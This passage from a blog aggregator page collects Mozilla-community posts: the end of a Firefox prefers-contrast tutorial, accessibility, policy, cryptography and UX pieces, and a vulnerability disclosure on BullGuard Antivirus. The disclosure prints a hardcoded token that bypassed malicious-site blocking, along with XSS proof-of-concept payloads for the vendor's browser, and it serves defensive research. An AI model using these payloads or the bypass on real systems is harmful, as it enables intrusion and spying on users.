    Forced,
}

Because we use #[derive(Parse)], Stylo will take care of generating the parsing code for us using the name of our enum and its options. It is seriously that easy. :-)

Evaluating the media query

Now that we’ve got our parsing logic hooked up, we’ll add some logic for evaluating our media query. If prefers-contrast only exposed low, no-preference, and high, then this would be as simple as creating some function that returns an instance of our enum above.

That said, the addition of a forced option adds some interesting gotchas to our media query. It’s not possible to simultaneously prefer low and high-contrast. However, it’s quite common for website visitors to prefer high contrast and have forced colors. Like we discussed earlier if a visitor is on Windows enabling high contrast also forces colors on webpages. Because enums can only be in one of their states at a time (i.e., the prefers-contrast enum can’t be high-contrast and fixed simultaneously) we’ll need to make some modifications to a single function design.

To properly represent prefers-contrast, we’ll split our logic in half. The first half will determine if colors are being forced and the second will determine the website visitor’s contrast preference. We can represent the presence or absence of forced colors with a boolean, but we’ll need a new enum for contrast preference. Let’s go ahead and add that to media_features.rs:

/// Represents the parts of prefers-contrast that explicitly deal with
/// contrast. Used in combination with information about rather or not
/// forced colors are active this allows for evaluation of the
/// prefers-contrast media query.
#[derive(Clone, Copy, Debug, FromPrimitive, PartialEq)]
#[repr(u8)]
pub enum ContrastPref {
    /// High contrast is preferred. Corresponds to an accessibility theme
    /// being enabled or firefox forcing high contrast colors.
    High,
    /// Low contrast is prefered. Corresponds to the
    /// browser.display.prefers_low_contrast pref being true.
    Low,
    /// The default value if neither high nor low contrast is enabled.
    NoPreference,
}

Voila! We have parsing and enums to represent the possible states of the prefers-contrast media query and a website visitor’s contrast preference done.

Adding functions in C++ and Rust

Now we add some logic to make prefers-contrast tick. We’ll do that in two steps. First, we’ll add a C++ function to determine contrast preferences, and then we’ll add a Rust function to call it and evaluate the media query.

Our C++ function will live in Gecko, Firefox’s layout engine. Information about high contrast settings is also collected in Gecko. This is quite handy for us. We’d like our C++ function to return our ContrastPref enum from earlier. Let’s start by generating bindings from Rust to C++ for that.

Starting in ServoBindings.toml we’ll add a mapping from our Stylo type to a Gecko type:

cbindgen-types = [
    # ...
    { gecko = "StyleContrastPref", servo = "gecko::media_features::ContrastPref" },
    # ...
]

Then, we’ll add a similar thing to Servo’s cbindgen.toml:

include = [
    # ...
    "ContrastPref",
    # ...
]

And with that, we’ve done it! cbindgen will generate the bindings so we have an enum to use and return from C++ code.

We’ve written a C++ function that’s relatively straightforward. We’ll move over to nsMediaFeatures.cpp and add it. If the browser is resisting fingerprinting, we’ll return no-preference. Otherwise, we’ll return high- or no-preference based on whether or not we’ve enabled high contrast mode (UseAccessibilityTheme).

StyleContrastPref Gecko_MediaFeatures_PrefersContrast(const Document* aDocument, const bool aForcedColors) {
    if (nsContentUtils::ShouldResistFingerprinting(aDocument)) {
        return StyleContrastPref::NoPreference;
    }
    // Neither Linux, Windows, nor Mac has a way to indicate that low
    // contrast is preferred so the presence of an accessibility theme
    // implies that high contrast is preferred.
    //
    // Note that MacOS does not expose whether or not high contrast is
    // enabled so for MacOS users this will always evaluate to
    // false. For more information and discussion see:
    // https://github.com/w3c/csswg-drafts/issues/3856#issuecomment-642313572
    // https://github.com/w3c/csswg-drafts/issues/2943
    if (!!LookAndFeel::GetInt(LookAndFeel::IntID::UseAccessibilityTheme, 0)) {
        return StyleContrastPref::High;
    }
    return StyleContrastPref::NoPreference;
}

Aside: This implementation doesn’t have a way to detect a preference for low contrast. As we discussed earlier neither Windows, macOS, nor Linux has a standard way to indicate that low contrast is preferred. Thus, for our initial implementation, we opted to keep things simple and make it impossible to toggle. That’s not to say that there isn’t room for improvement here. There are various less standard ways for users to indicate that they prefer low contrast — like forcing low contrast colors on Windows, Linux, or in Firefox.

Determining contrast preferences in Firefox

Finally, we’ll add the function definition to GeckoBindings.h so that our Rust code can call it.

mozilla::StyleContrastPref Gecko_MediaFeatures_PrefersContrast(
    const mozilla::dom::Document*, const bool aForcedColors);

Now that parsing, logic, and C++ bindings are set up, we’re ready to add our Rust function for evaluating the media query. Moving back over to media_features.rs, we’ll go ahead and add a function to do that.

Our function takes a device with information about where the media query is being evaluated. It includes an optional query value, representing the value that the media query is being evaluated against. The query value is optional because sometimes the media query can be evaluated without a query. In this case, we evaluate the truthiness of the contrast-preference that we normally would compare to the query. This is called evaluating the media query in the “boolean context”. If the contrast preference is anything other than no-preference, we go ahead and apply the CSS inside of the media query.

Contrast preference examples

That’s a lot of information, so here are some examples:

@media (prefers-contrast: high) { } /* query_value: Some(high) */
@media (prefers-contrast: low) { } /* query_value: Some(low) */
@media (prefers-contrast) { } /* query_value: None | "eval in boolean context" */

In the boolean context (the third example above) we first determine the actual contrast preference. Then, if it’s not no-preference the media query will evaluate to true and apply the CSS inside. On the other hand, if it is no-preference, the media query evaluates to false and we don’t apply the CSS.

With that in mind, let’s put together the logic for our media query!

fn eval_prefers_contrast(device: &Device, query_value: Option) -> bool {
    let forced_colors = !device.use_document_colors();
    let contrast_pref =
        unsafe { bindings::Gecko_MediaFeatures_PrefersContrast(device.document(), forced_colors) };
    if let Some(query_value) = query_value {
        match query_value {
            PrefersContrast::Forced => forced_colors,
            PrefersContrast::High => contrast_pref == ContrastPref::High,
            PrefersContrast::Low => contrast_pref == ContrastPref::Low,
            PrefersContrast::NoPreference => contrast_pref == ContrastPref::NoPreference,
        }
    } else {
        // Only prefers-contrast: no-preference evaluates to false.
        forced_colors || (contrast_pref != ContrastPref::NoPreference)
    }
}

The last step is to register our media query with Firefox. Still in media_features.rs, we’ll let Stylo know we’re done. Then we can add our function and enum to the media features list:

pub static MEDIA_FEATURES: [MediaFeatureDescription; 54] = [
    // ...
    feature!(
        atom!("prefers-contrast"),
        AllowsRanges::No,
        keyword_evaluator!(eval_prefers_contrast, PrefersContrast),
        // Note: by default this is only enabled in browser chrome and
        // ua. It can be enabled on the web via the
        // layout.css.prefers-contrast.enabled preference. See
        // disabled_by_pref in media_feature_expression.rs for how that
        // is done.
        ParsingRequirements::empty(),
    ),
    // ...
];

In conclusion

And with that, we’ve finished! With some care, we’ve walked through a near-complete implementation of prefers-contrast in Firefox. Triggered updates and tests are not covered, but are relatively small details. If you’d like to see all of the code and tests for prefers-contrast take a look at the Phabricator patch here.

prefers-contrast is a powerful and important media query that makes it easier for web authors to create accessible web pages. Using prefers-contrast websites can adjust to high and forced contrast preferences in ways that they were entirely unable to before. To get prefers-contrast, grab a copy of Firefox Nightly and set layout.css.prefers-contrast.enabled to true in about:config. Now, go forth and build a more accessible web! 🎉

Mozilla works to make the internet a global public resource that is open and accessible to all. The prefers-contrast media query, and other work by our accessibility team, ensures we uphold that commitment to our low-vision users and other users with disabilities. If you’re interested in learning more about Mozilla’s accessibility work you can check out the accessibility blog or the accessibility wiki page.

The post Adding prefers-contrast to Firefox appeared first on Mozilla Hacks - the Web developer blog.

Frederik BraunHardening Firefox against Injection Attacks – The Technical Details

This blog post has first appeared on the Mozilla Attack & Defense blog and was co-authored with Christoph Kerschbaumer and Tom Ritter

In a recent academic publication titled Hardening Firefox against Injection Attacks (to appear at SecWeb – Designing Security for the Web) we describe techniques which we have incorporated into Firefox …

Mozilla AccessibilityBroadening Our Impact

Last year, the accessibility team worked to identify and fix gaps in our screen reader support, as well as on some new areas of focus, like improving Firefox for users with low vision. As a result, we shipped some great features. In addition, we’ve begun building awareness across Mozilla and putting in place processes to help ensure delightful accessibility going forward, including a Firefox wide triage process.

With a solid foundation for delightful accessibility well underway, we’re looking at the next step in broadening our impact: expanding our engagement with our passionate, global community. It’s our hope that we can get to a place where a broad community of interested people become active participants in the planning, design, development and testing of Firefox accessibility. To get there, the first step is open communication about what we’re doing and where we’re headed.

To that end, we’ve created this blog to keep you all informed about what’s going on with Firefox accessibility. As a second step, we’ve published the Firefox Accessibility Roadmap. This document is intended to communicate our ongoing work, connecting the dots from our aspirations, as codified in our Mission and Manifesto, through our near term strategy, right down to the individual work items we’re tackling today. The roadmap will be updated regularly to cover at least the next six months of work and ideally the next year or so.

Another significant area of new documentation, pushed by Eitan and Morgan, is around our ongoing work to bring VoiceOver support to Firefox on macOS. In addition to the overview wiki page, which covers our high level plan and specific lists of bugs we’re targeting, there’s also a work in progress architectural overview and a technical guide to contributing to the Mac work.

We’ve also transitioned most of our team technical discussions from a closed Mozilla Slack to the open and participatory Matrix instance. Some exciting conversations are already happening and we hope that you’ll join us.

And that’s just the beginning. We’re always improving our documentation and onboarding materials so stay tuned to this channel for updates. We hope you find access to the team and the documents useful and that if something in our docs calls out to you that you’ll find us on Matrix and help out, whether that’s contributing ideas for better solutions to problems we’re tackling, writing code for features and fixes we need, or testing the results of development work.

We look forward to working with you all to make the Firefox family of products and services the best they can be, a delight to use for everyone, especially people with disabilities.

The post Broadening Our Impact appeared first on Mozilla Accessibility.

Mozilla Open Policy & Advocacy BlogNext Steps for Net Neutrality

Two years ago we first brought Mozilla v. FCC in federal court, in an effort to save the net neutrality rules protecting American consumers. Mozilla has long fought for net neutrality because we believe that the internet works best when people control their own online experiences.

Today is the deadline to petition the Supreme Court for review of the D.C. Circuit decision in Mozilla v. FCC. After careful consideration, Mozilla—as well as its partners in this litigation—are not seeking Supreme Court review of the D.C. Circuit decision. Even though we did not achieve all that we hoped for in the lower court, the court recognized the flaws of the FCC’s action and sent parts of it back to the agency for reconsideration. And the court cleared a path for net neutrality to move forward at the state level. We believe the fight is best pursued there, as well as on other fronts including Congress or a future FCC.

Net neutrality is more than a legal construct. It is a reflection of the fundamental belief that ISPs have tremendous power over our online experiences and that power should not be further concentrated in actors that have often demonstrated a disregard for consumers and their digital rights. The global pandemic has moved even more of our daily lives—our work, school, conversations with friends and family—online. Internet videos and social media debates are fueling an essential conversation about systemic racism in America. At this moment, net neutrality protections ensuring equal treatment of online traffic are critical. Recent moves by ISPs to favor their own content channels or impose data caps and usage-based pricing make concerns about the need for protections all the more real.

The fight for net neutrality will continue on. The D.C. Circuit decision positions the net neutrality movement to continue on many fronts, starting with a defense of California’s strong new law to protect consumers online—a law that was on hold pending resolution of this case.

Other states have followed suit and we expect more to take up the mantle. We will look to a future Congress or future FCC to take up the issue in the coming months and years. Mozilla is committed to continuing our work, with our broad community of allies, in this movement to defend the web and consumers and ensure the internet remains open and accessible to all.

The post Next Steps for Net Neutrality appeared first on Open Policy & Advocacy.

Mozilla Security BlogPerformance Improvements via Formally-Verified Cryptography in Firefox

Cryptographic primitives, while extremely complex and difficult to implement, audit, and validate, are critical for security on the web. To ensure that NSS (Network Security Services, the cryptography library behind Firefox) abides by Mozilla’s principle of user security being fundamental, we’ve been working with Project Everest and the HACL* team to bring formally-verified cryptography into Firefox.

In Firefox 57, we introduced formally-verified Curve25519, which is a mechanism used for key establishment in TLS and other protocols. In Firefox 60, we added ChaCha20 and Poly1305, providing high-assurance authenticated encryption. Firefox 69, 77, and 79 improve and expand these implementations, providing increased performance while retaining the assurance granted by formal verification.

Performance & Specifics

For key establishment, we recently replaced the 32-bit implementation of Curve25519 with one from the Fiat-Crypto project. The arbitrary-precision arithmetic functions of this implementation are proven to be functionally correct, and it improves performance by nearly 10x over the previous code. Firefox 77 updates the 64-bit implementation with new HACL* code, benefitting from a ~27% speedup. Most recently, Firefox 79 also brings this update to Windows. These improvements are significant: Telemetry shows Curve25519 to be the most widely used elliptic curve for ECDH(E) key establishment in Firefox, and increased throughput reduces energy consumption, which is particularly important for mobile devices.

64-bit Curve25519 with HACL*

32-bit Curve25519 with Fiat-Crypto

For encryption and decryption, we improved the performance of ChaCha20-Poly1305 in Firefox 77. Throughput is doubled by taking advantage of vectorization with 128-bit and 256-bit integer arithmetic (via the AVX2 instruction set on x86-64 CPUs). When these features are unavailable, NSS will fall back to an AVX or scalar implementation, both of which have been further optimized.

ChaCha20-Poly1305 with HACL* and AVX2

The HACL* project has introduced new techniques and libraries to improve efficiency in writing verified primitives for both scalar and vectorized variants. This allows aggressive code sharing and reduces the verification effort across many different platforms.

What’s Next?

For Firefox 81, we intend to incorporate a formally-verified implementation of the P256 elliptic curve for ECDSA and ECDH. Middle-term targets for verified implementations include GCM, the P384 and P521 elliptic curves, and the ECDSA signature scheme itself. While there remains work to be done, these updates provide an improved user experience and ease the implementation burden for future inclusion of platform-optimized primitives.

The post Performance Improvements via Formally-Verified Cryptography in Firefox appeared first on Mozilla Security Blog.

Wladimir PalantDismantling BullGuard Antivirus' online protection

Just like so many other antivirus applications, BullGuard antivirus promises to protect you online. This protection consists of the three classic components: protection against malicious websites, marking of malicious search results and BullGuard Secure Browser for your special web surfing needs. As so often, this functionality comes with issues of its own, some being unusually obvious.

Chihuahua looking into a mirror and seeing a bulldog (BullGuard logo) there<figcaption> Image credits: BullGuard, kasiagrafik, GDJ, rygle </figcaption>

Summary of the findings

The first and very obvious issue was found in the protection against malicious websites. While this functionality often cannot be relied upon, circumventing it typically requires some effort. Not so with BullGuard Antivirus: merely adding a hardcoded character sequence to the address would make BullGuard ignore a malicious domain.

Further issues affected BullGuard Secure Browsers: multiple Cross-Site Scripting (XSS) vulnerabilities in its user interface potentially allowed websites to spy on the user or crash the browser. The crash might be exploitable for Remote Code Execution (RCE). Proper defense in depth prevented worse here.

Online protection approach

BullGuard Antivirus listens in on all connections made by your computer. For some of these connections it will get between the server and the browser in order to manipulate server responses. That’s especially the case for malicious websites of course, but the server response for search pages will also be manipulated in order to indicate which search results are supposed to be trustworthy.

'Link safe' message showing next to Yahoo! link on Google Search

To implement this pop-up, the developers used an interesting trick: connections to port 3220 will always be redirected to the antivirus application, no matter which domain. So navigating to http://www.yahoo.com:3220/html?eWFob28uY29t will yield the following response:

'Link safe' message showing up under the address http://www.yahoo.com:3220/html?eWFob28uY29t

This approach is quite dangerous, a vulnerability in the content served up here will be exploitable in the context of any domain on the web. I’ve seen such Universal XSS vulnerabilities before. In case of BullGuard, none of the content served appears to be vulnerable however. It would still be a good idea to avoid the unnecessary risk: the server could respond to http://localhost:3220/ only and use CORS appropriately.

Unblocking malicious websites

To be honest, I couldn’t find a malicious website that BullGuard Antivirus would block. So I cheated and added malware.wicar.org to the block list in application’s settings. Navigating to the site now resulted in a redirect to bullguard.com:

Warning page originating at safebrowsing.bullguard.com indicating that malware.wicar.org is blocked

If you click “More details” you will see a link labeled “Continue to website. NOT RECOMMENDED” at the bottom. So far so good, making overriding the warning complicated and discouraged is sane user interface design. But how does that link work?

Each antivirus application came up with its own individual answer to this question. Some answers turned out more secure than others, but BullGuard’s is still rather unique. The warning page will send you to https://malware.wicar.org/?gid=13fd117f-bb07-436e-85bb-f8a3abbd6ad6 and this gid parameter will tell BullGuard Antivirus to unblock malware.wicar.org for the current session. Where does its value come from? It’s hardcoded in BullGuardFiltering.exe. Yes, it’s exactly the same value for any website and any BullGuard install.

So if someone were to run a malicious email campaign and they were concerned about BullGuard blocking the link to https://malicious.example.com/ – no problem, changing the link into https://malicious.example.com/?gid=13fd117f-bb07-436e-85bb-f8a3abbd6ad6 would disable antivirus protection.

Current BullGuard Antivirus release uses a hid parameter with a value dependent on website and current session. So neither predicting its value nor reusing a value from one website to unblock another should work any more.

XSSing the secure browser

Unlike some other antivirus solutions, BullGuard doesn’t market their BullGuard Secure Browser as an online banking browser. Instead, they seem to suggest that it is good enough for everyday use – if you can live with horrible user experience that is. It’s a Chromium-based browser which “protects you from vulnerable and malicious browser extensions” by not supporting any browser extensions.

Unlike Chromium’s, this browser’s user interface is a collection of various web pages. For example, secure://address_bar.html is the location bar and secure://find_in_page.html the find bar. All pages rely heavily on HTML manipulation via jQuery, so you are probably not surprised that there are cross-site scripting vulnerabilities here.

Vulnerability in the location bar

The code displaying search suggestions when you type something into the location bar went like this:

else if (vecFields[i].type == 3) {
    var string_search = BG_TRANSLATE_String('secure_addressbar_search');
    // type is search with Google
    strHtml += '><img src="' + vecFields[i].icon +
        '" alt="favicon" class="address_drop_favicon"/> ' +
        '<p class="address_drop_text"><span class="address_search_terms">' +
        vecFields[i].title + '</span><span class="address_search_provider"> - ' +
        string_search + '</span></p>';
}

No escaping performed here, so if you type something like <img src=x onerror=alert(document.location)> into the location bar, you will get JavaScript code executing in the context of secure://address_bar.html. Not only will the code stay there for the duration of the current browser session, it will be able to spy on location bar changes. Ironically, BullGuard’s announcement claims that their browser protects against man-in-the browser attacks which is exactly what this is.

You think that no user would be stupid enough to copy untrusted code into the location bar, right? But regular users have no reason to expect the world to explode simply because they typed in something. That’s why no modern browser allows typing in javascript: addresses any more. And javascript: addresses are far less problematic than the attack depicted here.

Vulnerability in the display of blocked popups

The address bar issue isn’t the only or even the most problematic XSS vulnerability. The page secure://blocked-popups.html runs the following code:

var li = $('<li/>')
    .addClass('bg_blocked_popups-item')
    .attr('onclick', 'jsOpenPopup(\''+ list[i] + '\', '+ i + ');')
    .appendTo(cList);

No escaping performed here either, so a malicious website only needs to use single quotation marks in the pop-up address:

window.open(`/document/download.pdf#'+alert(location.href)+'`, "_blank");

That’s it, the browser will now indicate a blocked pop-up.

'Pop-ups blocked' message displayed in location bar

And if the user clicks this message, a message will appear indicating that arbitrary JavaScript code is running in the context of secure://blocked-popups.html now. That code can for example call window.bgOpenPopup() which allows it to open arbitrary URLs, even data: URLs that normally cannot be opened by websites. It could even open an ad page every few minutes, and the only way to get rid of it would be restarting the browser.

But the purpose of window.bgOpenPopup() function isn’t merely allowing the pop-up, it also removes a blocked pop-up from the list. By position, without any checks to ensure that the index is valid. So calling window.bgOpenPopup("...", 100000) will crash the browser – this is an access violation. Use a smaller index and the operation will “succeed,” corrupting memory and probably allowing remote code execution.

And finally, this vulnerability allows calling window.bgOnElementRectMeasured() function, setting the size of this pop-up to an arbitrary value. This allows displaying the pop-up on top of the legitimate browser user interface and display a fake user interface there. In theory, malicious code could conjure up a fake location bar and content area, messing with any website loaded and exfiltrating data. Normally, browsers have visual clues to clearly separate their user interface from the content area, but these would be useless here. Also, it would be comparably easy to make the fake user interface look convincing as this page can access the CSS styles used for the real interface.

What about all the other API functions?

While the above is quite bad, BullGuard Secure Browser exposes a number of other functions to its user interface. However, it seems that these can only be used by the pages which actually need them. So the blocked pop-ups page cannot use anything other than window.bgOpenPopup() and window.bgOnElementRectMeasured(). That’s proper defense in depth and it prevented worse here.

Conclusions

BullGuard simply hardcoding security tokens isn’t an issue I’ve seen before. It should be obvious that websites cannot be allowed to disable security features, and yet it seems that the developers somehow didn’t consider this attack vector at all.

The other conclusion isn’t new but worth repeating: if you build a “secure” product, you should use a foundation that eliminates the most common classes of vulnerabilities. There is no reason why a modern day application should have XSS vulnerabilities in its user interface, and yet it happens all the time.

Timeline

  • 2020-04-09: Started looking for a vulnerability disclosure process on BullGuard website, found none. Asked on Twitter, without success.
  • 2020-04-10: Sent an email to security@ address, bounced. Contacted mail@ support address asking how vulnerabilities are supposed to be reported.
  • 2020-04-10: Response asks for “clarification.”
  • 2020-04-11: Sent a slightly reformulated question.
  • 2020-04-11: Response tells me to contact feedback@ address with “application-related feedback.”
  • 2020-04-12: Sent the same inquiry to feedback@ support address.
  • 2020-04-15: Received apology for the “unsatisfactory response” and was told to report the issues via this support ticket.
  • 2020-04-15: Sent report about circumventing protection against malicious websites.
  • 2020-04-17: Sent report about XSS vulnerabilities in BullGuard Secure Browser (delay due to miscommunication).
  • 2020-04-17: Protection circumvention vulnerability confirmed and considered critical.
  • 2020-04-23: Told that the HTML attachment (proof of concept for the XSS vulnerability) was rejected by the email system, resent the email with a 7zip-packed attachment.
  • 2020-05-04: XSS vulnerabilities confirmed and considered critical.
  • 2020-05-18: XSS vulnerabilities fixed in 20.0.378 Hotfix 2.
  • 2020-06-29: Protection circumvention vulnerability fixed in 20.0.380 Hotfix 2 (release announcement wrongly talks about “XSS vulnerabilities in Secure Browser” again).
  • 2020-06-07: Got reply from the vendor that publishing the details one week before deadline is ok.

Firefox UXUX Book Club Recap: Writing is Designing, in Conversation with the Authors

The Firefox UX book club comes together a few times a year to discuss books related to the user experience practice. We recently welcomed authors Michael Metts and Andy Welfle to discuss their book Writing is Designing: Words and the User Experience (Rosenfeld Media, Jan. 2020).

Photo of Writing is Designing with notebook, coffee cup, and computer mouse on a table.

To make the most of our time, we collected questions from the group beforehand, organized them into themes, and asked people to upvote the ones they were most interested in.

An overview of Writing is Designing

“In many product teams, the words are an afterthought, and come after the “design,” or the visual and experiential system. It shouldn’t be like that: the writer should be creating words as the rest of the experience is developed. They should be iterative, validated with research, and highly collaborative. Writing is part of the design process, and writers are designers.” — Writing is Designing

Andy and Michael kicked things off with a brief overview of Writing is Designing. They highlighted how writing is about fitting words together and design is about solving problems. Writing as design brings the two together. These activities — writing and designing — need to be done together to create a cohesive user experience.

They reiterated that effective product content must be:

  • Usable: It makes it easier to do something. Writing should be clear, simple, and easy.
  • Useful: It supports user goals. Writers need to understand a product’s purpose and their audience’s needs to create useful experiences.
  • Responsible: What we write can be misused by people or even algorithms. We must take care in the language we use.

We then moved onto Q&A which covered these themes and ideas.

On writing a book that’s not just for UX writers

“Even if you only do this type of writing occasionally, you’ll learn from this book. If you’re a designer, product manager, developer, or anyone else who writes for your users, you’ll benefit from it. This book will also help people who manage or collaborate with writers, since you’ll get to see what goes into this type of writing, and how it fits into the product design and development process.” — Writing is Designing

You don’t have to be a UX writer or content strategy to benefit from Writing Is Designing. The book includes guidance for anyone involved in creating content for a user experience, including designers, researchers, engineers, and product managers. Writing is just as much of a design tool as Sketch or Figma—it’s just that the material is words not pixels.

When language perpetuates racism

“The more you learn and the more you are able to engage in discussions about racial justice, the more you are able to see how it impacts everything we do. Not questioning systems can lead to perpetuating injustice. It starts with our workplaces. People are having important conversations and questioning things that already should have been questioned.” — Michael Metts

Given the global focus on racial justice issues, it wasn’t surprising that we spent a good part of our time discussing how the conversation intersects with our day-to-day work.

Andy talked about the effort at Adobe, where he is the UX Content Strategy Manager, to expose racist terminology in its products, such as ‘master-slave’ and ‘whitelist-blacklist’ pairings. It’s not just about finding a neutral replacement term that appears to users in the interface, but rethinking how we’ve defined these terms and underlying structures entirely in our code.

Moving beyond anti-racist language

“We need to focus on who we are doing this for. We worry what we look like and that we’re doing the right thing. And that’s not the priority. The goal is to dismantle harmful systems. It’s important for white people to get away from your own feelings of wanting to look good. And focus on who you are doing it for and making it a better world for those people.” — Michael Metts

Beyond the language that appears in our products, Michael encouraged the group to educate themselves, follow Black writers and designers, and be open and willing to change. Any effective UX practitioner needs to approach their work with a sense of humility and openness to being wrong.

Supporting racial justice and the Black Lives Matter movement must also include raising long-needed conversations in the workplace, asking tough questions, and sitting with discomfort. Michael recommended reading How To Be An Antiracist by Ibram X. Kendi and So You Want to Talk About Race by Ijeoma Oluo.

Re-examining and revisiting norms in design systems

“In design systems, those who document and write are the ones who are codifying information for long term. It’s how terms like whitelist and blacklist, and master/slave keep showing up, decade after decade, in our stuff. We have a responsibility not to be complicit in codifying and continuing racist systems.” — Andy Welfle

Part of our jobs as UX practitioners is to codify and frame decisions. Design systems, for example, document content standards and design patterns. Andy reminded us that our own biases and assumptions can be built-in to these systems. Not questioning the systems we build and contribute to can perpetuate injustice.

It’s important to keep revisiting our own systems and asking questions about them. Why did we frame it this way? Could we frame it in another way?

Driving towards clarity early on in the design process

“It’s hard to write about something without understanding it. While you need clarity if you want to do your job well, your team and your users will benefit from it, too.” — Writing is Designing

Helping teams align and get clear on goals and user problems is a big part of a product writer’s job. While writers are often the ones to ask these clarifying questions, every member of the design team can and should participate in this clarification work—it’s the deep strategy work we must do before we can write and visualize the surface manifestation in products.

Before you open your favorite design tool (be it Sketch, Figma, or Adobe XD) Andy and Michael recommend writers and visual designers start with the simplest tool of all: a text editor. There you can do the foundational design work of figuring out what you’re trying to accomplish.

The longevity of good content

A book club member asked, “How long does good content last?” Andy’s response: “As long as it needs to.”

Software work is never ‘done.’ Products and the technology that supports them continue to evolve. With that in mind, there are key touch points to revisit copy. For example, when a piece of desktop software becomes available on a different platform like tablet or mobile, it’s a good time to revisit your context (and entire experience, in fact) to see if it still works.

Final thoughts—an ‘everything first’ approach

In the grand scheme of tech things, UX writing is still a relatively new discipline. Books like Writing for Designing are helping to define and shape the practice.

When asked (at another meet-up, not our own) if he’s advocating for a ‘content-first approach,’ Michael’s response was that we need an ‘everything first approach’ — meaning, all parties involved in the design and development of a product should come to the planning table together, early on in the process. By making the case for writing as a strategic design practice, this book helps solidify a spot at that table for UX writers.

Prior texts read by Mozilla’s UX book club

Tantek ÇelikChanges To IndieWeb Organizing, Brief Words At IndieWebCamp West

A week ago Saturday morning co-organizer Chris Aldrich opened IndieWebCamp West and introduced the keynote speakers. After their inspiring talks he asked me to say a few words about changes we’re making in the IndieWeb community around organizing. This is an edited version of those words, rewritten for clarity and context. — Tantek

Chris mentioned that one of his favorite parts of our code of conduct is that we prioritize marginalized people’s safety above privileged folks’s comfort.

That was a change we deliberately made last year, announced at last year’s summit. It was well received, but it’s only one minor change.

Those of us that have organized and have been organizing our all-volunteer IndieWebCamps and other IndieWeb events have been thinking a lot about the events of the past few months, especially in the United States. We met the day before IndieWebCamp West and discussed our roles in the IndieWeb community and what can we do to to examine the structural barriers and systemic racism and or sexism that exists even in our own community. We have been asking, what can we do to explicitly dismantle those?

We have done a bunch of things. Rather, we as a community have improved things organically, in a distributed way, sharing with each other, rather than any explicit top-down directives. Some improvements are smaller, such as renaming things like whitelist & blacklist to allowlist & blocklist (though we had documented blocklist since 2016, allowlist since this past January, and only added whitelist/blacklist as redirects afterwards).

Many of these changes have been part of larger quieter waves already happening in the technology and specifically open source and standards communities for quite some time. Waves of changes that are now much more glaringly obviously important to many more people than before. Choosing and changing terms to reinforce our intentions, not legacy systemic white supremacy.

Part of our role & responsibility as organizers (as anyone who has any power or authority, implied or explicit, in any organization or community), is to work to dismantle any aspect or institution or anything that contributes to white supremacy or to patriarchy, even in our own volunteer-based community.

We’re not going to get everything right. We’re going to make mistakes. An important part of the process is acknowledging when that happens, making corrections, and moving forward; keep listening and keep learning.

The most recent change we’ve made has to do with Organizers Meetups that we have been doing for several years, usually a half day logistics & community issues meeting the day before an IndieWebCamp. Or Organizers Summits a half day before our annual IndieWeb Summits; in 2019 that’s when we made that aforementioned update to our Code of Conduct to prioritize marginalized people’s safety.

Typically we have asked people to have some experience with organizing in order to participate in organizers meetups. Since the community actively helps anyone who wants to put in the work to become an organizer, and provides instructions, guidelines, and tips for successfully doing so, this seemed like a reasonable requirement. It also kept organizers meetups very focused on both pragmatic logistics, and dedicated time for continuous community improvement, learning from other events and our own IndieWebCamps, and improving future IndieWebCamps accordingly.

However, we must acknowledge that our community, like a lot of online, open communities, volunteer communities, unfortunately reflects a very privileged demographic. If you look at the photos from Homebrew Website Clubs, they’re mostly white individuals, mostly male, mostly apparently cis. Mostly white cis males. This does not represent the users of the Web. For that matter, it does not represent the demographics of the society we're in.

One of our ideals, I believe, is to better reflect in the IndieWeb community, both the demographic of everyone that uses the Web, and ideally, everyone in society. While we don't expect to solve all the problems of the Web (or society) by ourselves, we believe we can take steps towards dismantling white supremacy and patriarchy where we encounter them.

One step we are taking, effective immediately, is making all of our organizers meetups forward-looking for those who want to organize a Homebrew Website Club or IndieWebCamp. We still suggest people have experience organizing. We also explicitly recognize that any kind of requirement of experience may serve to reinforce existing systemic biases that we have no interest in reinforcing.

We have updated our Organizers page with a new statement of who should participate, our recognition of broader systemic inequalities, and an explicit:

… welcome to Organizers Meetups all individuals who identify as BIPOC, non-male, non-cis, or any marginalized identity, independent of any organizing experience.

This is one step. As organizers, we’re all open to listening, learning, and doing more work. That's something that we encourage everyone to adopt. We think this is an important aspect of maintaining a healthy community and frankly, just being the positive force that that we want the IndieWeb to be on the Web and hopefully for society as a whole.

If folks have questions, I or any other organizers are happy to answer them, either in chat or privately, however anyone feels comfortable discussing these changes.

Thanks. — Tantek

Karl DubostJust Write A Blog Post

This post will be very short. That's the goal. And this is addressed to the Mozilla community as large (be employes or contributors).

  1. Create a blog
  2. Ask to be added to Planet Mozilla
  3. Write small, simple short things

And that's all.

The more you write, the easier it will become.

Write short form, long form will come later. Just by itself. Without you noticing it.

Want good examples?

Notes:

  1. Wordpress. Tumblr. SquareSpace. Ghost. Medium. Qiita. Or host your own with your own domain name: Gandi. DigitalOcean. It doesn't have to be beautiful. It needs to have content.
  2. For Example, how I asked to add mine.
  3. What you are working? What you think the Web should be? What this small feature would do? Have an idea? Wondering about something? Instead of sending an email to one individual or an internal group chat or a private mailing list, just write a blog post and then send an email with a link to the blog post asking for feedback.

Otsukare!

The Servo BlogThis Week In Servo 131

Welcome back everyone - it’s been a year without written updates, but we’re getting this train back on track! Servo hasn’t been dormant in that time; the biggest news was the public release of Firefox Reality (built on Servo technology) in the Microsoft store.

In the past week, we merged 44 PRs in the Servo organization’s repositories.

The latest nightly builds for common platforms are available at download.servo.org.

Planning and Status

Our roadmap is available online, including the team’s plans for 2020.

This week’s status updates are here.

Exciting works in progress

Notable Additions

  • SimonSapin fixed a source of Undefined Behaviour in the smallvec crate.
  • muodov improved the compatibility of invalid form elements with the HTML specification, and added the missing requestSubmit API.
  • kunalmohan implemented GPUQueue APIs for WebGPU, and avoided synchronous updates, and implemented the getMappedRange API for GPUBuffer.
  • alaryso fixed a bug preventing running tests when using rust-analyzer.
  • alaryso avoided a panic in pages that perform layout queries on disconnected iframes.
  • paulrouget integrated virtual keyboard support for text inputs into Firefox Reality, as well as added support for keyboard events.
  • Manishearth implemented WebAudio node types for reading and writing MediaStreams.
  • gterzian improved the responsiveness of the browser when shutting down.
  • utsavoza updated the referrer policy implementation to match the updated specification.
  • ferjm implemented support for WebRTC data channels.

New Contributors

Interested in helping build a web browser? Take a look at our curated list of issues that are good for new contributors!

The Rust Programming Language BlogAnnouncing Rustup 1.22.0

The rustup working group is happy to announce the release of rustup version 1.22.0. Rustup is the recommended tool to install Rust, a programming language that is empowering everyone to build reliable and efficient software.

If you have a previous version of rustup installed, getting rustup 1.22.0 is as easy as closing your IDE and running:

rustup self update

